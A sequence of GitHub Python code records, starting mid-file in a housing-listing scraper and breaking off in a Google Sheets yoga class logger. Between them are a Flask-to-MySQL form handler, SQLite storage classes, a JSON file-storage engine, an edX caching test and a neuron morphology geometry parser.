'Metro Station', 'Longtitue', 'Latitude', 'posting agent', 'description', 'first_post', 'Refresh']\n\n\n for list_id in data.Listing_Id:\n response = requests.get(f'{baseurl}/{list_id}')\n if response.status_code == 200:\n soup_info = BeautifulSoup(response.content, \"html.parser\")\n\n\n #each list's information\n try:\n detail = soup_info.find_all('div', class_='details')[0].find_all(name='div')\n except IndexError:\n print(list_id)\n\n #from 'Type' to 'Area'\n for indx, j in enumerate(detail[0:-3]):\n house_data.loc[list_id,features[indx]] = j.text.strip()\n\n #'Compound'\n house_data.loc[list_id,\"Compound\"] = detail[-3].text.split('/')[0].strip()\n\n # metro station\n text = detail[-2].text\n try:\n found = re.search('walk to(.+?)on line', text).group(1)\n except AttributeError:\n found = ''\n house_data.loc[list_id,\"Metro\"] = found.strip()\n\n #long & lat\n long = soup_info.find('span', itemprop=\"longitude\").text\n lat = soup_info.find('span', itemprop=\"latitude\").text\n house_data.loc[list_id,\"Longtitude\"] = long\n house_data.loc[list_id,\"Latitude\"] = lat\n\n #posting agent\n house_data.loc[list_id,\"Agent\"] = soup_info.find('p', class_='username').text\n\n #description\n house_data.loc[list_id,\"Description\"] = soup_info.find('div', class_='description').text.strip()\n\n #post and views\n post = soup_info.find('div', class_='posted-and-views').text.strip().split(',')\n\n house_data.loc[list_id,\"First_post\"] = ' '.join(post[0].split(' ')[1:])\n house_data.loc[list_id,\"Refresh\"] = ' '.join(post[2].split(' ')[2:])\n\n #values.append(value) # all listings\n\n #amenities\n amenity_pos = soup_info.find('div', class_='amenities').find_all('li', class_='positive')\n amenity_neg = soup_info.find('div', class_='amenities').find_all('li', class_='negative')\n\n amenity_pos = [i.text.strip() for i in amenity_pos]\n amenity_neg = [i.text.strip() for i in amenity_neg]\n\n for indx, amenity in 
enumerate(amenity_pos):\n house_data.loc[list_id,amenity_pos[indx]] = 1\n\n for indx, amenity in enumerate(amenity_neg):\n house_data.loc[list_id, amenity_neg[indx]] = 0\n return house_data\n\ndef save_data():\n house_data = extract_data(get_data(0,25))\n house_data = house_data.drop_duplicates()\n to_page = house_data[house_data['Type'].isnull()]\n\n house_data[\"extra_index\"] = house_data.Listing_Id\n house_data.set_index(\"extra_index\", inplace=True)\n\n house_data = page_data(to_page)\n #house_data.to_csv(\"housing_data_full.csv\", index=False)\n print(f\"Done, current size of database is {house_data.shape}\")\n return house_data\n","repo_name":"JessicaChuh/shanghai_housing","sub_path":"data_scraping.py","file_name":"data_scraping.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
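The metro-station extraction above leans on a lazy regex capture between 'walk to' and 'on line', falling back to an empty string when neither phrase appears. A standalone probe of that pattern (the listing text is invented):

import re

text = "5 min walk to People's Square on line 2"  # hypothetical listing snippet
try:
    found = re.search('walk to(.+?)on line', text).group(1)
except AttributeError:
    # re.search returned None: no match in this listing.
    found = ''
print(found.strip())  # People's Square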
+{"seq_id":"12478181578","text":"from flask import Flask, request, render_template\nimport mysql.connector\n\napp = Flask(__name__)\n\n@app.route('/')\ndef form():\n return render_template('form.html')\n\n@app.route('/submit', methods=['POST'])\ndef submit():\n # Retrieve the form data\n name = request.form['name']\n email = request.form['email']\n message = request.form['message']\n\n cnx = mysql.connector.connect(user='user', password='password',\n host='localhost', database='mydatabase')\n cursor = cnx.cursor()\n\n query = \"INSERT INTO messages (name, email, message) VALUES (%s, %s, %s)\"\n values = (name, email, message)\n cursor.execute(query, values)\n cnx.commit()\n\n cursor.close()\n cnx.close()\n\n # Return a success message\n return 'Form submitted successfully!'\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"ACYProjects/cloud_refs","sub_path":"appengine/to_mysql.py","file_name":"to_mysql.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10123751007","text":"'''\nprint('Hola Mundo')\nvalor = int(input('ingrese un numero '))\nprint('la suma es', valor + 10)\n'''\n\n'''\nint()\nfloat()\nstr()\nbool()\ncomplex()\n'''\n\n# asdasds\n\n# tipos de datos\n# entero\nnumero1 = 45\nnumero2 = 50\nreales = 45.0\ncomplejo = 45 + 2j\ncadena = \"hola\"\nboolean = True\nnada = None\n\n# operadores aritmeticos + - * / // % **\n\"\"\"\nprint(2 ** 5)\nprint(5 / 2)\nprint(5 // 2)\nprint(5 % 2)\n\"\"\"\n# estructuras de control\n# condicionales\n\n# < > >= <= == !=\n# and or ^\nopcion = None\n\nif(opcion == 1):\n print('mayor que 45')\nelif(opcion == 2):\n print(\"es menor\")\nelif(opcion == 3):\n print(\"es menor\")\nelse:\n print('son igual')\n\n# colecciones lista diccionario conjunto ...\n\nlista_numeros = [99, True, 22.5, \"hola\", 45, 78]\n\n# print(lista_numeros[2])\n\n# Ciclos\nnumero = 10\n# mientras\nwhile(numero < 10):\n print('numero', numero)\n numero += 1\n# para\nfor numero in lista_numeros:\n print(numero)\n","repo_name":"belwalter/curso_python_2018","sub_path":"inicio.py","file_name":"inicio.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"20237301040","text":"'''\\\n음악 저장소\n===========\n\n음악 정보를 저장한다. \n다음과 같은 특징을 갖는다.\n\n- SQLite를 이용한 저장\n- Song 객체를 저장한다.\n- 음악 제목으로 검색할 수 있다\n'''\n\nimport sqlite3\nfrom datetime import datetime\nfrom song import Song\n\n# DB 파일 이름\nDB_PATH = 'jukebox.db'\n\nclass Store(object):\n \"음악을 DB에 저장 관리한다.\"\n \n def __init__(self):\n \"\"\"DB연결\"\"\"\n self.db = sqlite3.connect(DB_PATH, check_same_thread = False)\n self._setup_db()\n\n def update_or_new(self, song):\n \"기존에 있던 노래면 갱신하고 아니면 새로 생성한다.\"\n print(song)\n if song.dbid:\n print('update')\n self.update(song)\n else:\n print('new')\n self.save(song)\n\n def save(self, song):\n \"새로 생성한다.\"\n \n cursor = self.db.cursor()\n sql = \"\"\"\\\ninsert into SONGS \n (uid, title, artist, url, img_url, played_count, created_at, description, duration)\n values (?, ?, ?, ?, ?, ?, ?, ?, ?)\n\"\"\"\n song.created_at = datetime.now()\n\n data = (song.uid, song.title, song.artist, song.url,\n song.img_url, song.played_count, song.created_at, song.description, song.duration)\n\n cursor.execute(sql, data)\n \n cursor.close()\n song.dbid = cursor.lastrowid\n self.db.commit()\n print('saved ' + song.uid)\n\n\n def remove_all(self):\n \"모든 노래 제거\"\n cursor = self.db.cursor()\n sql = \"\"\"\\\nDELETE FROM SONGS;\n\"\"\"\n cursor.execute(sql)\n cursor.close()\n self.db.commit()\n\n def update(self, song):\n \"기존 데이터를 갱신한다.\"\n\n cursor = self.db.cursor()\n sql = \"\"\"\\\nupdate SONGS \n set uid=?, title=?, artist=?, url=?, img_url=?, played_count=?, description=?, duration=?\n where id=?\n\"\"\"\n data = (song.uid, song.title, song.artist, song.url,\n song.img_url, song.played_count, song.description, song.duration, song.dbid)\n cursor.execute(sql, data)\n cursor.close()\n self.db.commit()\n\n def find_by_id(self, dbid):\n \"UID로 노래를 찾는다.\"\n cursor = self.db.cursor()\n sql = '''\\\nselect id, uid, title, artist, url, img_url, played_count, created_at, description, duration FROM SONGS where id = ?\n'''\n cursor.execute(sql, (dbid, ))\n data = cursor.fetchone()\n if data:\n song = Song()\n\n song.dbid = data[0]\n song.uid = data[1]\n song.title = data[2]\n song.artist = data[3]\n song.url = data[4]\n song.img_url = data[5]\n song.played_count = data[6]\n song.created_at = data[7]\n song.description = data[8]\n song.duration = data[9]\n \n return song\n\n def find_by_uid(self, uid):\n \"UID로 노래를 찾는다.\"\n cursor = self.db.cursor()\n sql = '''\\\nselect id, uid, title, artist, url, img_url, played_count, created_at, description, duration FROM SONGS where uid = ?\n'''\n cursor.execute(sql, (uid, ))\n data = cursor.fetchone()\n if data:\n song = Song()\n\n song.dbid = data[0]\n song.uid = data[1]\n song.title = data[2]\n song.artist = data[3]\n song.url = data[4]\n song.img_url = data[5]\n song.played_count = data[6]\n song.created_at = data[7]\n song.description = data[8]\n song.duration = data[9] \n \n return song\n \n def find_songs_by_title(self, title):\n \"노래 제목으로 곡을 찾는다.\"\n\n cursor = self.db.cursor()\n sql = '''\\\nselect id, uid, title, artist, url, img_url, played_count, created_at, description, duration FROM SONGS where title like ?\n'''\n cursor.execute(sql, (title, ))\n ret = []\n\n for data in cursor.fetchmany(5):\n if data:\n song = Song()\n\n song.dbid = data[0]\n song.uid = data[1]\n song.title = data[2]\n song.artist = data[3]\n song.url = data[4]\n song.img_url = data[5]\n song.played_count = data[6]\n song.created_at = data[7]\n song.description = data[8]\n song.duration = data[9]\n\n ret.append(song)\n \n return ret\n\n\n def 
get_songs(self):\n cursor = self.db.cursor()\n sql = '''\\\nselect id, uid, title, artist, url, img_url, played_count, created_at, description, duration FROM SONGS\n'''\n cursor.execute(sql)\n ret = []\n\n while True:\n data = cursor.fetchone()\n if data:\n song = Song()\n\n song.dbid = data[0]\n song.uid = data[1]\n song.title = data[2]\n song.artist = data[3]\n song.url = data[4]\n song.img_url = data[5]\n song.played_count = data[6]\n song.created_at = data[7]\n song.description = data[8]\n song.duration = data[9]\n \n yield song\n else:\n break\n\n \n \n def _setup_db(self):\n self._setup_song_table()\n\n def _setup_song_table(self):\n sql = '''\ncreate table if not exists SONGS (\n id integer primary key autoincrement,\n uid text unique,\n title text,\n artist text,\n url text,\n img_url text,\n played_count integer,\n created_at datetime,\n description text,\n duration integer\n);'''\n cursor = self.db.cursor()\n cursor.execute(sql)\n cursor.close()\n self.db.commit() \n\n\ndef test():\n from song import Song\n store = Store()\n\n song = Song()\n song.title = \"노래 제목\"\n song.uid = 'uid01'\n song.url = \"http://song_url\"\n song.played_count = 1\n store.save(song)\n\n s = store.findByUid('uid01')\n print(s)\n\n for s in store.findSongsByTitle('%노래%'):\n print(s)\n\ndef test_get_songs():\n store = Store()\n for song in store.get_songs():\n print(song)\n \n\nif __name__ == '__main__':\n test_get_songs()\n \n","repo_name":"jinniahn/book_python_example","sub_path":"ch13/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":6411,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"}
+{"seq_id":"11088304385","text":"import os\nimport datetime\n\n# Current timestamp for dynamic folder naming\nnow = datetime.datetime.now()\n\n# Base paths for clarity and ease of modification\nBASE_PATH = '/Users/haoyunou/Desktop/ms-security/研究院绩效考核/'\nOUTPUT_BASE_PATH = os.path.join(BASE_PATH, 'exp-data')\n\n# ----------------- # \n# Input Data Paths #\n# ----------------- #\nDATA_FOLDER_PATH = os.path.join(BASE_PATH, '2023Q1&Q2研究院工作量统计/')\nRESEARCHER_INFO_EXCEL_PATH = os.path.join(BASE_PATH, '分析师列表(修正版).xlsx')\nSALESPERSON_INFO_EXCEL_PATH = os.path.join(BASE_PATH, '销售列表.xlsx')\n\n# ----------------- # \n# Output Data Path #\n# ----------------- #\nOUTPUT_FOLDER_PATH = OUTPUT_BASE_PATH\nTXT_FOLDER = os.path.join(OUTPUT_BASE_PATH, 'roadshow_txts')\nTXT_FOLDER_PATH = os.path.join(TXT_FOLDER, now.strftime(\"%Y-%m-%d_%H-%M-%S\"))\n\n# Ensure the output path exists\nif not os.path.exists(TXT_FOLDER_PATH):\n os.makedirs(TXT_FOLDER_PATH)\n\n","repo_name":"OuHaoyun/okr-evaluation","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"70029565843","text":"#!/usr/bin/python3\n\"\"\"\n Module to storing data and load from JSON file\n\"\"\"\nimport json\nimport models\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.amenity import Amenity\nfrom models.review import Review\nfrom models.place import Place\nfrom models.state import State\nfrom models.city import City\n\n\nclass FileStorage():\n \"\"\"\n Serializes instances to a JSON file and\n deserializes JSON file to instances\n\n Private class attributes:\n __file_path:string - path to the JSON file\n to store de data\n\n __objects:dictionary - empty but will store\n all objects by .id (ex: to store\n a BaseModel object with id=12121212, the key\n will be BaseModel.12121212)\n\n \"\"\"\n\n # |---------------PRIVATE CLASS ATTRIBUTES---------------|\n __file_path = \"data.json\"\n __objects = {}\n\n # |--------------SETTER & GETTER 'name'-----------|\n @property\n def objects(self):\n \"\"\"\n Getter for objects\n \"\"\"\n\n return (self.__objects)\n\n # |---------------PUBLIC INSTANCE METHODS ---------------|\n def all(self):\n \"\"\"\n returns the dictionary of all objects\n \"\"\"\n all_objects = dict()\n for key in self.__objects:\n instance_dict = self.objects.get(key)\n _object = eval(instance_dict.get('__class__'))(**instance_dict)\n all_objects[key] = (_object.__str__())\n\n return (all_objects)\n\n\n def all_two(self):\n \"\"\"\n returns the dictionary of all objects\n \"\"\"\n all_objects = dict()\n for key in self.__objects:\n instance_dict = self.objects.get(key)\n _object = eval(instance_dict.get('__class__'))(**instance_dict)\n all_objects[key] = (_object.__str__())\n\n return (all_objects)\n\n def new(self, obj):\n \"\"\"\n sets in __objects the obj with key .id\n\n Attributes:\n Obj: object to add to the __objects dict\n \"\"\"\n\n key = str(obj.__class__.__name__) + '.' + str(obj.id)\n dictionary = (obj.to_dict())\n self.__objects[key] = dictionary\n\n def save(self):\n \"\"\"\n serializes __objects to the JSON file\n (path: __file_path)\n \"\"\"\n\n dump = json.dumps(self.__objects)\n with open(self.__file_path, 'w') as storage_file:\n storage_file.write(dump)\n\n def reload(self):\n \"\"\"\n deserializes the JSON file to __objects (only if the JSON file\n (__file_path) exists ; otherwise, do nothing.\n If the file doesn’t exist, no exception should be raised)\n \"\"\"\n try:\n with open(self.__file_path, 'r') as read_file:\n self.__objects = json.load(read_file)\n self.all()\n except FileNotFoundError:\n pass\n","repo_name":"lemejiamo/AirBnB_clone","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"7199516734","text":"import json\nimport yaml\n\nwith open(\"help_file.txt\") as handle:\n lines = handle.readlines()\n\nsnippets = {}\n\nlen_lines = len(lines)\n\nfor i, line in enumerate(lines):\n if line.startswith(\"Type\"):\n name = lines[i - 1].strip()\n vtype = line.split()[1].lower()\n ident = \"{}-{}\".format(vtype, name)\n j = i + 1\n description = []\n while j < len_lines and not lines[j].startswith(\"Type\"):\n dline = lines[j].rstrip()\n for subhead in [\"Use\", \"See also\", \"Format\", \"Default\"]:\n if dline.startswith(subhead):\n dline = \"- \" + subhead + \":\" + dline[len(subhead):]\n description.append(dline)\n j += 1\n snippets[ident] = {\n \"prefix\": ident,\n \"body\": name,\n \"description\": \"\\n\".join(description)\n }\n\nwith open(\"help_file_output_types.yaml\") as handle:\n output_data = yaml.load(handle)\n\nfor name, descript in output_data.items():\n ident = \"output-\" + name\n snippets[ident] = {\n \"prefix\": ident,\n \"body\": \"output {} ${{0:filename}}\".format(name),\n \"description\": descript\n }\n\nwith open(\"snippets/gulp-snippets.code-snippets\", \"w\") as handle:\n json.dump(snippets, handle, indent=2)\n","repo_name":"chrisjsewell/gulp-vscode-syntax","sub_path":"convert_help_file.py","file_name":"convert_help_file.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"12594906063","text":"\"\"\"\nTests core caching facilities.\n\"\"\"\n\n\nfrom django.test import TestCase\nfrom opaque_keys.edx.locator import AssetLocator, CourseLocator\n\nfrom openedx.core.djangoapps.contentserver.caching import del_cached_content, get_cached_content, set_cached_content\n\n\nclass Content:\n \"\"\"\n Mock cached content\n \"\"\"\n def __init__(self, location, content):\n self.location = location\n self.content = content\n\n def get_id(self):\n return self.location.to_deprecated_son()\n\n\nclass CachingTestCase(TestCase):\n \"\"\"\n Tests for https://edx.lighthouseapp.com/projects/102637/tickets/112-updating-asset-does-not-refresh-the-cached-copy\n \"\"\"\n unicodeLocation = AssetLocator(CourseLocator('c4x', 'mitX', '800'), 'thumbnail', 'monsters.jpg')\n # Note that some of the parts are strings instead of unicode strings\n nonUnicodeLocation = AssetLocator(CourseLocator('c4x', 'mitX', '800'), 'thumbnail', 'monsters.jpg')\n mockAsset = Content(unicodeLocation, 'my content')\n\n def test_put_and_get(self):\n set_cached_content(self.mockAsset)\n self.assertEqual(self.mockAsset.content, get_cached_content(self.unicodeLocation).content,\n 'should be stored in cache with unicodeLocation')\n self.assertEqual(self.mockAsset.content, get_cached_content(self.nonUnicodeLocation).content,\n 'should be stored in cache with nonUnicodeLocation')\n\n def test_delete(self):\n set_cached_content(self.mockAsset)\n del_cached_content(self.nonUnicodeLocation)\n self.assertEqual(None, get_cached_content(self.unicodeLocation),\n 'should not be stored in cache with unicodeLocation')\n self.assertEqual(None, get_cached_content(self.nonUnicodeLocation),\n 'should not be stored in cache with nonUnicodeLocation')\n","repo_name":"openedx/edx-platform","sub_path":"cms/djangoapps/contentstore/tests/test_core_caching.py","file_name":"test_core_caching.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"}
+{"seq_id":"37430990274","text":"from parse import *\n\nmargin = 10\n\n# Function parseMorphologies\n# Take multiple morphologies and put them together in a cube\n# Inputs:\n# morphologies : list of morphologies .geo files\n# type : type of positioning\n# 0 : simple translation on the X axys\n# 1 : positioning using TODO ADD NAME\n# factor : scaling factor for the point size\ndef parseMorphologies(morphologies, type, factor):\n counter_points = 0\n counter_lines = 0\n geo = ''\n dmg = ''\n minPoint = [100000,100000,100000]\n maxPoint = [-100000,-100000,-100000]\n txt = str(len(morphologies)) + '\\n'\n for i in range(len(morphologies)):\n actual_counter_points = counter_points\n actual_counter_lines = counter_lines\n limitPoint = maxPoint[0] - minPoint[0] #Suppose that every neuron have aproximatelly the same size TODO Correct this\n content = []\n txt_points = ''\n txt_lines = ''\n\n with open(morphologies[i]) as f:\n content = f.read().split('\\n')\n for j in range(len(content)):\n cleanedLine = content[j].replace(\"{\",\"\").replace(\"}\",\"\").replace(\" \",\"\")\n print(str(j)+\": \"+cleanedLine)\n point_parse = parse(\"Point({p})={x},{y},{z},{s};\",cleanedLine)\n line_parse = parse(\"Line({l})={p1},{p2};\",cleanedLine)\n if (point_parse != None):\n # Setting new values TODO Translation and rotation here\n p = int(point_parse['p']) + actual_counter_points\n x = float(point_parse['x']) + i * limitPoint\n y = float(point_parse['y'])\n z = float(point_parse['z'])\n s = float(point_parse['s']) * factor\n\n # Checking Min, Max\n checkX = checkMinMax(x,minPoint[0],maxPoint[0])\n minPoint[0] = checkX[0]\n maxPoint[0] = checkX[1]\n checkX = checkMinMax(y,minPoint[1],maxPoint[1])\n minPoint[1] = checkX[0]\n maxPoint[1] = checkX[1]\n checkX = checkMinMax(z,minPoint[2],maxPoint[2])\n minPoint[2] = checkX[0]\n maxPoint[2] = checkX[1]\n\n # Printing\n geo += 'Point(' + str(p) + ') = {' + str(x) + ',' + str(y) + ',' + str(z) + ',' + str(s) + '};\\n'\n dmg += 'Point[' + str(p) + '] = gmod::new_point3(gmod::Vector{' + str(x) + ',' + str(y) + ',' + str(z) + '},' + str(s) + ');\\n'\n txt_points += '\\n'+ str(p)\n\n counter_points += 1\n\n elif (line_parse != None):\n # Setting new values\n l = int(line_parse['l']) + actual_counter_lines\n p1 = int(line_parse['p1']) + actual_counter_points\n p2 = int(line_parse['p2']) + actual_counter_points\n\n # Printing\n geo += 'Line(' + str(l) + ') = {' + str(p1) + ',' + str(p2) + '} ;\\n'\n dmg += 'gmod::add_to_group(g, gmod::new_line2(Point[' + str(p1) + '], Point[' + str(p2) + ']));\\n'\n txt_lines += ' '+ str(l)\n\n counter_lines += 1\n txt += str(counter_points - actual_counter_points) + txt_points + '\\n'\n txt += str(counter_lines - actual_counter_lines) + txt_lines + '\\n'\n # Main part pour Gmodel to generate .dmg\n dmg = \"#include \\n\"+\"#include \\n\"+\"\\n\"+\"int main()\\n\"+\" std::vector Point;\\n\"+\" auto g = gmod::new_group();\\n\"+\" Point.resize(\" + str(counter_points) + \");\\n\"+\"\\n\"+ dmg\n\n # Cube calculation\n cubeSize = max(maxPoint[0]-minPoint[0],maxPoint[1]-minPoint[1],maxPoint[2]-minPoint[2])/2 + margin\n middle = [(maxPoint[0]+minPoint[0])/2,(maxPoint[1]+minPoint[1])/2,(maxPoint[2]+minPoint[2])/2]\n\n # Cube generation .geo\n geo += newPoint(middle[0]-cubeSize, middle[1]-cubeSize, middle[2]-cubeSize,cubeSize/2,1)\n geo += newPoint(middle[0]+cubeSize, middle[1]-cubeSize, middle[2]-cubeSize,cubeSize/2,2)\n geo += newPoint(middle[0]+cubeSize, middle[1]+cubeSize, middle[2]-cubeSize,cubeSize/2,3)\n geo += newPoint(middle[0]-cubeSize, 
middle[1]+cubeSize, middle[2]-cubeSize,cubeSize/2,4)\n geo += newPoint(middle[0]-cubeSize, middle[1]-cubeSize, middle[2]+cubeSize,cubeSize/2,5)\n geo += newPoint(middle[0]+cubeSize, middle[1]-cubeSize, middle[2]+cubeSize,cubeSize/2,6)\n geo += newPoint(middle[0]+cubeSize, middle[1]+cubeSize, middle[2]+cubeSize,cubeSize/2,7)\n geo += newPoint(middle[0]-cubeSize, middle[1]+cubeSize, middle[2]+cubeSize,cubeSize/2,8)\n\n geo += newLine('p1','p2',1)\n geo += newLine('p2','p3',2)\n geo += newLine('p3','p4',3)\n geo += newLine('p4','p1',4)\n geo += newLine('p5','p6',5)\n geo += newLine('p6','p7',6)\n geo += newLine('p7','p8',7)\n geo += newLine('p8','p5',8)\n geo += newLine('p1','p5',9)\n geo += newLine('p2','p6',10)\n geo += newLine('p3','p7',11)\n geo += newLine('p4','p8',12)\n\n geo += \"Line Loop(1) = {l1,l2,l3,l4};\\nLine Loop(2) = {l5,l6,l7,l8};\\nLine Loop(3) = {l1,l10,-l5,-l9};\\nLine Loop(4) = {l2,l11,-l6,-l10};\\nLine Loop(5) = {l3,l12,-l7,-l11};\\nLine Loop(6) = {l4,l9,-l8,-l12};\\n\"\n\n geo += \"Plane Surface(11) = {1};\\nPlane Surface(12) = {2};\\nPlane Surface(13) = {3};\\nPlane Surface(14) = {4};\\nPlane Surface(15) = {5};\\nPlane Surface(16) = {6};\\n\"\n\n geo += \"Surface Loop(1) = {11,13,14,15,16,12};\\nVolume(11) = {1};\\n\"\n\n geo += \"For t In {0:\" + str(counter_lines-1) + \"}\\n Line{t} In Volume{11};\\nEndFor\"\n\n # Cube generation .dmg\n dmg += \"auto c = gmod::new_cube(gmod::Vector{\" + str(minPoint[0]) + \", \" + str(minPoint[1]) + \", \" + str(minPoint[2]) + \"},gmod::Vector{\" + str(cubeSize) + \", 0, 0},gmod::Vector{0, \" + str(cubeSize) + \", 0},gmod::Vector{0, 0, \" + str(cubeSize) + \"});\\n\"\n dmg += \"gmod::add_to_group(g, c);\\n\"\n dmg += 'write_closure_to_geo(g, \"neuron.geo\");\\nwrite_closure_to_dmg(g, \"neuron.dmg\");\\n}'\n\n\n\n return [geo,dmg,txt]\n\ndef checkMinMax(a,mini,maxi):\n retMin = mini\n retMax = maxi\n if (amaxi):\n retMax = a\n return [retMin,retMax]\n\ndef newPoint(x,y,z,g,i):\n return \"p\" + str(i) + \" = newp;\\nPoint(p\" + str(i) + \") = {\" + str(x) + \", \" + str(y) + \", \" + str(z) + \", \" + str(g) + \"};\\n\"\n\ndef newLine(p1,p2,i):\n return \"l\" + str(i) + \" = newl;\\nLine(l\" + str(i) + \") = {\" + str(p1) + \",\" + str(p2) + \"};\\n\"\n","repo_name":"sv91/Morpho-Organizer","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
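The per-line matching in parseMorphologies relies on the parse library's format-string patterns; a standalone check against cleaned .geo lines (the coordinates are invented):

from parse import parse

# parse() returns a Result whose named fields are string captures.
point = parse("Point({p})={x},{y},{z},{s};", "Point(3)=1.5,2.0,-0.5,0.8;")
print(point['p'], point['x'], point['s'])  # 3 1.5 0.8
line = parse("Line({l})={p1},{p2};", "Line(2)=3,4;")
print(line['l'], line['p1'], line['p2'])   # 2 3 4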
+{"seq_id":"15034959493","text":"\"\"\"\nBelow code required to link into google sheets spreadsheet,\ndatetime and colorama to add stylling the terminal.\n\nI used the following YouTube video to find out how\nto use Colorama:\nhttps://www.youtube.com/watch?v=u51Zjlnui4Y\n\"\"\"\nimport datetime\nfrom datetime import date\nimport gspread\nfrom google.oauth2.service_account import Credentials\nimport colorama\nfrom colorama import Fore\ncolorama.init()\n\nSCOPE = [\n \"https://www.googleapis.com/auth/spreadsheets\",\n \"https://www.googleapis.com/auth/drive.file\",\n \"https://www.googleapis.com/auth/drive\"\n]\n\nCREDS = Credentials.from_service_account_file('creds.json')\nSCOPED_CREDS = CREDS.with_scopes(SCOPE)\nGSPREAD_CLIENT = gspread.authorize(SCOPED_CREDS)\nSHEET = GSPREAD_CLIENT.open('yoga _flow_class_record')\n\ncapacity = SHEET.worksheet(\"capacity\")\nprices = SHEET.worksheet(\"prices\")\nworksheet_update = SHEET.worksheet(\"attendance\")\n\n\"\"\"\nnew_lesson_data adds user input into a list which is pushed back\ninto the spreadsheet when all data is collected.\n\"\"\"\nnew_lesson_data = []\n\nprint(Fore.LIGHTMAGENTA_EX)\nprint(\"Hello, welcome to Yoga Flow Class Record.\\n\")\nprint(\"\\033[39m\")\n\n\ndef lesson_day_data():\n \"\"\"\n Input and validate 'day' data from the user and\n returns an error if incorrect data submitted.\n\n I used the Stack Overflow to help with the below while loop.\n Page linked in the Readme file.\n \"\"\"\n\n print(\"Please provide the day of your lesson in full.\")\n print(\"Example: monday not mon\")\n\n lesson_day = (\n \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\",\n \"Saturday\", \"Sunday\")\n\n while True:\n print(Fore.CYAN)\n day_data_str = input(\"Enter lesson day here:\\n\")\n print(\"\\033[39m\")\n input_day = day_data_str.title()\n day = str(input_day)\n\n day_data = False\n\n if day in lesson_day:\n day_data = True\n print(\"\\n\")\n\n if day_data:\n # append user input to a list of user inputs\n new_lesson_data.append(input_day)\n break\n else:\n print(Fore.RED)\n print(f\"{Fore.RED}Invalid data: {day}\")\n print(\"\\033[39m\")\n print(\"Please input a day in the week\")\n\n\ndef lesson_date_data():\n \"\"\"\n Input and validate 'date' data from the user and\n return an error if incorrect data submitted.\n\n I used Stack Overflow to help with this function. 
The\n link used has been added to the README file.\n \"\"\"\n while True:\n print(\"Please input the date of your lesson.\")\n print(Fore.CYAN)\n input_date = input(\"Enter the date in format 'dd/mm/yy':\\n\")\n print(\"\\033[39m\")\n\n try:\n day, month, year = input_date.split('/')\n my_date = date(int(year), int(month), int(day))\n if my_date:\n print(\"\\n\")\n # append user input to a list of user inputs\n new_lesson_data.append(input_date)\n break\n except ValueError as e:\n print(Fore.RED)\n print(f\"Invalid data: {e}\")\n print(\"\\033[39m\")\n print(\"Please try again \\n\")\n\n\ndef lesson_time_data():\n \"\"\"\n Input and validate 'time' data from the user and\n return an error if incorrect data submitted\n \"\"\"\n\n while True:\n print(\"Please provide time (00:00) of your lesson.\")\n print(Fore.CYAN)\n time_data_str = input(\"Enter time here:\\n\")\n print(\"\\033[39m\")\n\n timeformat = (\"%H:%M\")\n\n try:\n validtime = datetime.datetime.strptime(\n time_data_str, timeformat)\n if validtime:\n print(\"\\n\")\n # append user input to a list of user inputs\n new_lesson_data.append(time_data_str)\n break\n except ValueError as e:\n print(f\"{Fore.RED}Invalid data: {e} \\n\")\n print(\"\\033[39m\")\n\n\ndef lesson_duration_data():\n \"\"\"\n Input and validate 'duration' data from the user and\n return error if incorrect data submitted\n\n Used the following website to help with using the\n Global keyword:\n https://www.w3schools.com/python/python_variables_global.asp\n \"\"\"\n\n while True:\n print(\"Please provide the duration of your lesson in minutes.\")\n print(\"Example: 60\")\n try:\n print(Fore.CYAN)\n duration_data_str = int(input(\"Enter lesson duration here:\\n\"))\n print(\"\\033[39m\")\n\n # Used this page to find out how to remove an item from a list:\n # https://www.edureka.co/blog/python-list-remove/#pop()\n lesson_durations = prices.col_values(1)\n del lesson_durations[0]\n # Used method 3 to turn a list of strings into a list of integers\n # https://www.geeksforgeeks.org/python-converting-all-strings-in-list-to-integers/\n duration_int = list(map(int, lesson_durations))\n\n # I used Stack Overflow to help with comparing a user answer with\n # a list:\n # https://stackoverflow.com/questions/3944655/testing-user-input-against-a-list-in-python\n if duration_data_str in duration_int:\n print(\"\\n\")\n # append user input to a list of user inputs\n new_lesson_data.append(duration_data_str)\n\n # duration_index Stores globally the index of the duration\n # input by the user from the list pulled from the worksheet.\n # This will be used when calculating earnings for that lesson.\n global duration_index\n duration_index = 0\n duration_data_index = duration_int.index(duration_data_str)\n duration_index = duration_data_index\n break\n else:\n print(Fore.RED)\n print(f\"{duration_data_str} is not a valid duration\\n\")\n print(\"\\033[39m\")\n except ValueError as e:\n print(f\"{Fore.RED}invalid data: {e}please try again \\n\")\n print(\"\\033[39m\")\n\n\ndef lesson_location_data():\n \"\"\"\n Input and validate 'location' data from the user and\n return error if incorrect data submitted\n\n Used the below link to find out how to link to a\n column of data in a spreadsheet:\n https://docs.gspread.org/en/latest/user-guide.html#getting-a-cell-value\n\n Used the following website to help with using the\n Global keyword:\n https://www.w3schools.com/python/python_variables_global.asp\n \"\"\"\n\n while True:\n print(\"Please provide the location of your lesson.\")\n 
